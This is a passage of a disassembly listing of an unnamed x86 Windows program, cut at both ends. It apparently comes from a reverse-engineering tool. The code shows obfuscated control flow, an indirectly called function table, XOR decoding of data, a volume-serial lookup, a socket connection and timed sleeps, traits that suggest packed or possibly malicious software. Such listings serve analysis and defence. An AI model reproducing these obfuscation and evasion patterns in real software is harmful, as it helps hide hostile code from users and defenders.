cmp dword ptr [ebp-4040h], 3
jge loc_9B2630
jmp off_9B9EF5
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF3E8
loc_9B51AC: ; CODE XREF: sub_9AF3E8+8�j
push 1
pop eax
loc_9B51AF: ; CODE XREF: sub_9AF3E8+2�j
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push eax
push 40h
call dword ptr [edx+7Ch]
retn
; END OF FUNCTION CHUNK FOR sub_9AF3E8
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp+0Ch]
pop ebx
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
mov eax, ebx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD97C
loc_9B51E4: ; CODE XREF: sub_9AD97C+28A8�j
; DATA XREF: .text:off_9B99EE�o
mov [ebp-1Ch], esi
jmp loc_9AC18B
; END OF FUNCTION CHUNK FOR sub_9AD97C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B51EC: ; CODE XREF: sub_9B0930-2A55�j
push off_9B89B4
push dword ptr [eax]
pop eax
push eax
call esi
push dword_9BCB74
pop ecx
mov edx, [ecx+10h]
mov [edx+54h], eax
mov eax, dword_9BCB74
mov eax, [eax+10h]
mov ecx, [eax+54h]
test ecx, ecx
jz loc_9B23EF
jmp loc_9B5594
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B5228 proc near ; CODE XREF: sub_9AEBB8+61�j
; DATA XREF: .text:off_9B9052�o
push ebx
push ebx ; lpFileSystemNameBuffer
lea ecx, [ebp-128h]
push ecx ; lpFileSystemFlags
lea edx, [ebp-12Ch]
push edx ; lpMaximumComponentLength
lea eax, [ebp-124h]
push eax ; lpVolumeSerialNumber
push ebx ; nVolumeNameSize
push ebx ; lpVolumeNameBuffer
lea ecx, [ebp-120h]
push ecx ; lpRootPathName
call GetVolumeInformationA
and eax, eax
jnz loc_9ABDE3
jmp off_9BA7C9
sub_9B5228 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B525C: ; CODE XREF: sub_9B1A08-30A4�j
; DATA XREF: .text:off_9B8D2B�o
mov esi, eax
mov [ebp+var_41E8], esi
inc eax
mov [ebp+var_41E0], eax
cmp eax, 1
jnz loc_9AF792
jmp off_9BA488
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3FF8
loc_9B527C: ; CODE XREF: sub_9B3FF8-82E2�j
cmp ebx, edi
ja loc_9B2884
jmp loc_9B02B0
; END OF FUNCTION CHUNK FOR sub_9B3FF8
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B2F1C
loc_9B528F: ; CODE XREF: sub_9B2F1C-79CB�j
; sub_9B2F1C-5ACF�j ...
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-10h]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B2F1C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B52A8: ; CODE XREF: sub_9B3864-4054�j
; DATA XREF: .text:off_9B9260�o
cmp edi, 11h
jnz loc_9AFC90
jmp loc_9AF0F8
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9B52B8: ; CODE XREF: sub_9B3864-1EAF�j
push [ebp+var_2020]
pop eax
test eax, eax
jnz loc_9AF480
jmp off_9BA611
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B52D0: ; CODE XREF: sub_9B1D80+1F97�j
call sub_9B36E8
mov edx, eax
mov [ebp-2050h], edx
mov eax, [ebp-202Ch]
and eax, 7FFFFFFFh
mov ecx, edx
and ecx, 7FFFFFFFh
cmp ecx, eax
jbe loc_9B0208
jmp loc_9AAFDC
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B5300 proc near ; CODE XREF: sub_9B3984-7BCB�p
; sub_9B63D8-2C39�p ...
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 009ABA00 SIZE 00000009 BYTES
push ebx
push ebp
mov ebp, [esp+8+arg_4]
push esi
push eax
pop esi
mov ebx, ecx
or esi, esi
jle loc_9ABA00
jmp off_9B8A02
sub_9B5300 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B531C: ; CODE XREF: sub_9B0930-3C7�j
or ecx, ecx
jz loc_9B23EF
jmp loc_9B0E28
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B36E8
loc_9B532C: ; CODE XREF: sub_9B36E8+5E�j
; DATA XREF: .text:off_9B8CC1�o
push dword_9BBD2C
pop esi
mov [ebp-1Ch], esi
cmp esi, edi
jz loc_9AC48D
jmp loc_9AC484
; END OF FUNCTION CHUNK FOR sub_9B36E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9B5344: ; CODE XREF: sub_9AF25C-3883�j
; sub_9AF25C-1696�j
test al, 2
jz loc_9AB8D1
jmp off_9BADA0
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B5354: ; CODE XREF: sub_9B1D80:loc_9B0208�j
mov eax, [ebp-2028h]
and eax, eax
jnz loc_9B3ECB
jmp off_9B87DC
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9B5368: ; CODE XREF: sub_9AC250-F70�j
xor eax, [esp+0Ch+arg_0]
loc_9B536C: ; CODE XREF: sub_9AC250+152A�j
; sub_9AC250+2F26�j ...
mov ecx, 15A4E35h
mul ecx
add eax, 1
adc edx, 0
xor [esi+8], dx
push ecx
pop edx
mul edx
add eax, 1
adc edx, 0
shr edx, 1
xor [esi+0Ch], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 2
xor [esi+8], dx
push ecx
pop edx
mul edx
add eax, 1
adc edx, 0
shr edx, 3
xor [esi+0Ch], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 4
xor [esi+8], dx
mov edx, ecx
mul edx
add eax, 1
adc edx, 0
shr edx, 5
xor [esi+0Ch], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 6
xor [esi+8], dx
push ecx
pop edx
mul edx
add eax, 1
adc edx, 0
shr edx, 7
xor [esi+0Ch], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 8
xor [esi+8], dx
mov edx, ecx
mul edx
add eax, 1
adc edx, 0
shr edx, 9
xor [esi+0Ch], dx
push dword ptr [esi+8]
pop edi
push edi
pop edx
jmp loc_9B0F50
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B29B0
loc_9B541B: ; CODE XREF: sub_9B29B0-3FDA�j
; sub_9B29B0-6CC�j
mov dword ptr [ebp-4], 0FFFFFFFFh
mov eax, [ebp-228h]
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp-1Ch]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B29B0
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B5444: ; CODE XREF: sub_9B1A08-36BC�j
; sub_9B1A08-31FC�j
test al, 4
jz loc_9AD484
jmp off_9BB09B
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4CF4
loc_9B5454: ; CODE XREF: sub_9B4CF4-2019�j
; DATA XREF: .text:off_9B9518�o
sub eax, edx
mov edi, ebx
dec edi
loc_9B5459: ; CODE XREF: sub_9B4CF4+76B�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_9B5459
jmp off_9BABBF
; END OF FUNCTION CHUNK FOR sub_9B4CF4
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9B5468: ; CODE XREF: sub_9ADDA4+35F7�j
dec edi
mov [ebp-30h], edi
mov eax, [ebp+edi*4-27Ch]
mov [ebp+esi*4-27Ch], eax
jmp loc_9AED43
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9B5480 proc near ; CODE XREF: sub_9AF25C-3988�p
; sub_9AF25C-3891�p ...
; FUNCTION CHUNK AT 009AB858 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 009AD8D8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009AE9A0 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B0AB0 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B335B SIZE 00000018 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9BA5EC
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp-18h], esp
push ecx
pop esi
mov dword ptr [ebp-4], 0
test esi, esi
jz loc_9B335B
jmp off_9B88C8
sub_9B5480 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B54C0: ; CODE XREF: sub_9B63D8-942�j
cmp esi, 0FFFFFFFFh
jz loc_9AF944
jmp off_9BA98E
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B54D0: ; CODE XREF: sub_9B4FD0-3F73�j
lea ecx, [eax+eax*2]
shl ecx, 4
cmp dword_9BBF74[ecx], esi
jnz loc_9ACC18
jmp off_9B8C64
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B174C
loc_9B54E8: ; CODE XREF: sub_9B174C+2854�j
sub eax, edi
loc_9B54EA: ; CODE XREF: sub_9B174C+4656�j
mov [esi], eax
mov ecx, dword_9BBE3C
mov edx, [ecx]
sub edx, eax
sub edx, edi
mov [ebx], edx
mov ecx, [esi]
push dword_9BBE3C
pop eax
mov esi, [eax+44h]
add esi, edi
mov edi, [ebp+arg_4]
push ecx
pop edx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
cmp dword ptr [ebx], 0
jnz loc_9B166F
jmp off_9B9A21
; END OF FUNCTION CHUNK FOR sub_9B174C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9B5528: ; CODE XREF: sub_9AC250+2F2C�j
cmp ecx, ebx
jz loc_9B536C
jmp off_9BB029
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD11C
loc_9B5538: ; CODE XREF: sub_9AD11C+2E�j
mov ecx, [esp+18h+arg_0]
push dword_9BCB74
pop edx
sub eax, eax
mov [esp+18h+var_14], eax
mov [esp+18h+var_10], eax
mov [esp+18h+var_C], eax
mov [esp+18h+var_10], ecx
push [esp+18h+arg_4]
pop ecx
push edi
mov [esp+1Ch+var_8], eax
mov word ptr [esp+1Ch+var_14], 2
mov eax, [edx+10h]
push ecx
call dword ptr [eax+8]
mov edx, dword_9BCB74
push 10h
lea ecx, [esp+1Ch+var_10]
push ecx
mov word ptr [esp+20h+var_10+2], ax
mov eax, [edx+10h]
push esi
call dword ptr [eax+50h]
test eax, eax
jnz loc_9B0B34
jmp loc_9B36C0
; END OF FUNCTION CHUNK FOR sub_9AD11C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B5594: ; CODE XREF: sub_9B0930+48E8�j
push off_9B9072
mov ecx, [eax]
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx+10h]
mov [ecx+58h], eax
mov edx, dword_9BCB74
mov eax, [edx+10h]
mov ecx, [eax+58h]
or ecx, ecx
jz loc_9B23EF
jmp loc_9B0984
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B55C4: ; CODE XREF: sub_9B63D8-3713�j
; DATA XREF: .text:off_9B8E9C�o
lea ebx, [eax+4]
mov ecx, 9
sub eax, eax
mov [ebp-2124h], ebx
mov edi, off_9B9936
lea esi, [ebp-2120h]
repe cmpsb
jz loc_9B1278
jmp off_9B9082
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B55F4: ; CODE XREF: sub_9B0930-1A74�j
push 10h
push 40h
call edi
mov edx, dword_9BCB74
mov [edx+14h], eax
push 10h
push 40h
call edi
push dword_9BCB74
pop ecx
mov [ecx+18h], eax
push dword_9BCB74
pop eax
mov ecx, [eax]
test ecx, ecx
jz loc_9B23EF
jmp off_9B8EDA
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B562C proc near ; CODE XREF: sub_9B03E8:loc_9AC404�p
var_13C = dword ptr -13Ch
var_138 = dword ptr -138h
var_134 = byte ptr -134h
var_130 = dword ptr -130h
var_12C = dword ptr -12Ch
var_128 = dword ptr -128h
var_124 = byte ptr -124h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AD498 SIZE 00000025 BYTES
; FUNCTION CHUNK AT 009AE76C SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009AECDF SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009AF144 SIZE 00000030 BYTES
; FUNCTION CHUNK AT 009AFAE4 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009B07C8 SIZE 00000031 BYTES
; FUNCTION CHUNK AT 009B0ADC SIZE 00000036 BYTES
; FUNCTION CHUNK AT 009B2354 SIZE 00000012 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BAFCF
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 12Ch
push dword_9B8788
pop eax
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor ebx, ebx
mov [ebp+var_128], ebx
mov [ebp+var_4], ebx
push dword_9BCB74
pop eax
mov ecx, [eax]
call dword ptr [ecx+84h]
test eax, eax
mov eax, off_9BAE26
js loc_9B0AE1
jmp loc_9B0ADC
sub_9B562C endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9B5690: ; CODE XREF: sub_9B03E8+3596�j
; DATA XREF: .text:off_9B9775�o
push dword_9BF380
pop eax
or eax, 1
mov word ptr dword_9BF380, ax
loc_9B56A0: ; CODE XREF: sub_9B03E8+27F1�j
; sub_9B03E8+3590�j
mov dword ptr [ebp-14Ch], 9Ch
push dword_9BCB74
pop ecx
mov edx, [ecx]
lea eax, [ebp-14Ch]
push eax
call dword ptr [edx+90h]
test eax, eax
jz loc_9AC404
jmp loc_9ABFC0
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9B56D0: ; CODE XREF: sub_9B1D80+4394�j
push dword ptr [ebp-2044h]
pop eax
test byte ptr [eax+8], 8
jz loc_9AE945
jmp loc_9AE918
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B0C20
loc_9B56EB: ; CODE XREF: sub_9B0C20+38�j
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B0C20
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B4FD0
loc_9B5708: ; CODE XREF: sub_9B4FD0-62FA�j
push eax
pop ebx
mov [ebp-228h], ebx
loc_9B5710: ; CODE XREF: sub_9B4FD0-7CA6�j
cmp ebx, 0FFFFFFFFh
jz loc_9ABB60
jmp off_9BA340
; END OF FUNCTION CHUNK FOR sub_9B4FD0
; ---------------------------------------------------------------------------
align 10h
push 1
pop eax
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B037C
loc_9B5724: ; CODE XREF: sub_9B037C-326E�j
mov ebx, [ebp-4058h]
; END OF FUNCTION CHUNK FOR sub_9B037C
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9B572A: ; CODE XREF: sub_9B2E04-3D69�j
; sub_9B037C+29�j
test edi, edi
jz loc_9B107C
jmp loc_9ACB90
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9B5738: ; CODE XREF: sub_9AF030+45E0�j
lea edx, [ebx+eax]
cmp edx, 100000h
ja loc_9AC634
jmp loc_9B4160
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9B574C: ; CODE XREF: sub_9B0930+55AA�j
; DATA XREF: .text:off_9B9897�o
push off_9BA3D4
push dword ptr [eax]
pop eax
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx+0Ch]
pop edx
mov [edx+10h], eax
push dword_9BCB74
pop eax
mov eax, [eax+0Ch]
mov ecx, [eax+10h]
and ecx, ecx
jz loc_9B23EF
jmp loc_9B38FC
; ---------------------------------------------------------------------------
loc_9B5780: ; CODE XREF: sub_9B0930-A76�j
push off_9B9827
mov eax, [eax]
push eax
call esi
push dword_9BCB74
pop ecx
push dword ptr [ecx+10h]
pop edx
mov [edx+0Ch], eax
mov eax, dword_9BCB74
mov eax, [eax+10h]
mov ecx, [eax+0Ch]
test ecx, ecx
jz loc_9B23EF
jmp off_9B9974
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B57B4 proc near ; CODE XREF: sub_9B2118-1B75�p
var_14C = dword ptr -14Ch
var_148 = dword ptr -148h
var_144 = byte ptr -144h
var_44 = byte ptr -44h
var_34 = dword ptr -34h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AC7E4 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 009B1104 SIZE 0000002F BYTES
; FUNCTION CHUNK AT 009B34C8 SIZE 00000052 BYTES
; FUNCTION CHUNK AT 009B45E4 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 009B4BAB SIZE 00000023 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BA971
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 13Ch
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
jmp off_9BAEFD
sub_9B57B4 endp
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9AFF64
loc_9B5807: ; CODE XREF: sub_9AFF64-3385�j
; sub_9AFF64-30E0�j ...
mov [ebp+var_4], 0FFFFFFFFh
mov eax, dword_9BCB74
mov ecx, [eax]
push off_9BADC8
call dword ptr [ecx+1Ch]
push [ebp+var_228]
pop eax
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9AFF64
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B5844: ; CODE XREF: sub_9B63D8-22BB�j
push dword_9BCB74
pop ecx
mov edx, [ecx]
lea eax, [ebp-216Ch]
push eax
lea ecx, [ebp-2188h]
push ecx
call dword ptr [edx+48h]
test eax, eax
jz loc_9B4696
jmp loc_9B4668
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B586C: ; CODE XREF: sub_9B1F68+28ED�j
lea ebx, [edi+ebp-24Ch]
mov esi, [ebx]
push 0
push esi
push 30h
pop eax
call sub_9AC32C
mov [ebp-58h], eax
test al, 21h
jz loc_9B4254
jmp off_9B87F6
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9B5894: ; CODE XREF: sub_9AB1A0+9965�j
; sub_9AB1A0+AAD1�j
mov ecx, dword_9BCB74
push dword ptr [ecx]
pop edx
push eax
push off_9B9F99
call dword ptr [edx+34h]
push dword_9BEBD0
pop eax
imul eax, 3B6h
cdq
and edx, 7FFh
add eax, edx
push eax
pop ecx
push 3E8h
pop eax
sar ecx, 0Bh
sub eax, ecx
mov [ebp-30h], eax
loc_9B58CD: ; CODE XREF: sub_9AB1A0+1BBC�j
; sub_9AB1A0+38AF�j
mov eax, [ebp+0Ch]
push eax
pop edx
dec eax
test edx, edx
mov [ebp+0Ch], eax
jz loc_9B11EB
jmp off_9B92AA
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9B58E4: ; CODE XREF: sub_9B1F68+6E7�j
push 0
push esi
call sub_9B0E7C
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
push esi
call dword ptr [eax+38h]
loc_9B58FB: ; CODE XREF: sub_9B1F68+6E1�j
inc edi
jmp loc_9AE84E
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9B5904 proc near ; CODE XREF: sub_9AEAAC+19F5�j
; DATA XREF: .text:off_9B9EE9�o
; FUNCTION CHUNK AT 009AB198 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009AC524 SIZE 00000038 BYTES
; FUNCTION CHUNK AT 009ACF8C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009AF6B8 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009AFF18 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 009B129C SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B25BC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B3EE8 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 009B42F0 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B4388 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 009B47E8 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 009B4AA4 SIZE 00000018 BYTES
push ebx
call sub_9B3EFC
add esp, 4
test eax, eax
jz loc_9B42FE
jmp loc_9ACF8C
sub_9B5904 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ABD30
loc_9B591C: ; CODE XREF: sub_9ABD30+21D6�j
; sub_9ABD30+A061�j
pop edi
pop esi
mov eax, 1
pop ebp
retn 10h
; END OF FUNCTION CHUNK FOR sub_9ABD30
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC448
loc_9B5928: ; CODE XREF: sub_9AC448+8�j
; DATA XREF: .text:off_9BABE7�o
push dword_9BCB74
pop ecx
push dword ptr [ecx]
pop edx
push eax
call dword ptr [edx+80h]
; END OF FUNCTION CHUNK FOR sub_9AC448
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_6. PRESS KEYPAD "+" TO EXPAND]
align 4
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9B593C: ; CODE XREF: sub_9B63D8-5026�j
or ebx, ebx
jz loc_9AF944
jmp off_9BAD10
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC250
loc_9B594C: ; CODE XREF: sub_9AC250+4D1D�j
; DATA XREF: .text:off_9BAD48�o
mov ebx, [esi+0Ch]
mov edx, ebx
shr edx, 5
push edx
pop ecx
mov ebp, 1
and ecx, 1Fh
shl ebp, cl
shr edx, 5
test dword_9BA4E8[edx*4], ebp
jnz loc_9B536C
jmp off_9BAAD4
; END OF FUNCTION CHUNK FOR sub_9AC250
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9B5978: ; CODE XREF: sub_9ACEE8-3E0�j
xor ebx, ebx
mov [ebp-0B4h], ebx
call sub_9B227C
mov [ebp-0B8h], eax
mov edi, [ebp-0D4h]
test edi, edi
jz loc_9B0FA3
jmp loc_9B33AC
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B59A0: ; CODE XREF: sub_9B1A08-380C�j
call sub_9AC448
mov dword ptr [ebx], 0
loc_9B59AB: ; CODE XREF: sub_9B1A08-4160�j
; sub_9B1A08-3812�j
inc esi
jmp loc_9AD78A
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2010
loc_9B59B4: ; CODE XREF: sub_9B2010-38FD�j
; DATA XREF: .text:off_9B8956�o
push dword_9BCB74
pop eax
push dword ptr [eax]
pop ecx
push 1388h
call dword ptr [ecx+4]
jmp loc_9B012F
; END OF FUNCTION CHUNK FOR sub_9B2010
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B2160
loc_9B59CC: ; CODE XREF: sub_9B2160-2E0D�j
sub eax, eax
push ebx
pop ecx
mov edx, ecx
shr ecx, 2
rep stosd
push edx
pop ecx
and ecx, 3
rep stosb
loc_9B59DE: ; CODE XREF: sub_9B2160-2E13�j
push dword ptr [esi+48h]
pop edi
test edi, edi
jz loc_9B165A
jmp off_9BA170
; END OF FUNCTION CHUNK FOR sub_9B2160
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9B59F0: ; CODE XREF: sub_9B1A08-4576�j
; DATA XREF: .text:off_9B97E1�o
mov eax, dword_9BCB74
mov ecx, [eax]
call dword ptr [ecx+30h]
sub eax, [ebp+var_4204]
cmp eax, 2710h
jbe loc_9AF398
jmp loc_9AD788
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AE860
loc_9B5A10: ; CODE XREF: sub_9AE860+F05�j
; DATA XREF: .text:off_9BA9FD�o
mov ecx, off_9BA1D0[edx*4]
mov esi, ecx
loc_9B5A19: ; CODE XREF: sub_9AE860+71BE�j
mov dl, [ecx]
inc ecx
or dl, dl
jnz short loc_9B5A19
jmp off_9BADA8
; END OF FUNCTION CHUNK FOR sub_9AE860
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-1Ch]
pop esi
push dword ptr [ebp-10h]
pop ecx
mov eax, esi
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC170
loc_9B5A4C: ; CODE XREF: sub_9AC170+B�j
; DATA XREF: .text:off_9B8C2E�o
mov esi, off_9B94FC
mov ecx, 0Ch
rep movsd
movsw
movsb
; END OF FUNCTION CHUNK FOR sub_9AC170
; START OF FUNCTION CHUNK FOR sub_9B6078
loc_9B5A5C: ; CODE XREF: sub_9B6078+3B�j
cmp edx, 3
jnz loc_9AB94D
jmp off_9B96E0
; END OF FUNCTION CHUNK FOR sub_9B6078
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AEE5C
loc_9B5A6C: ; CODE XREF: sub_9AEE5C+1965�j
; DATA XREF: .text:off_9B8FC8�o
push dword ptr [edx+ecx+4]
pop eax
loc_9B5A71: ; CODE XREF: sub_9AEE5C-E61�j
; sub_9AEE5C+195F�j
pop esi
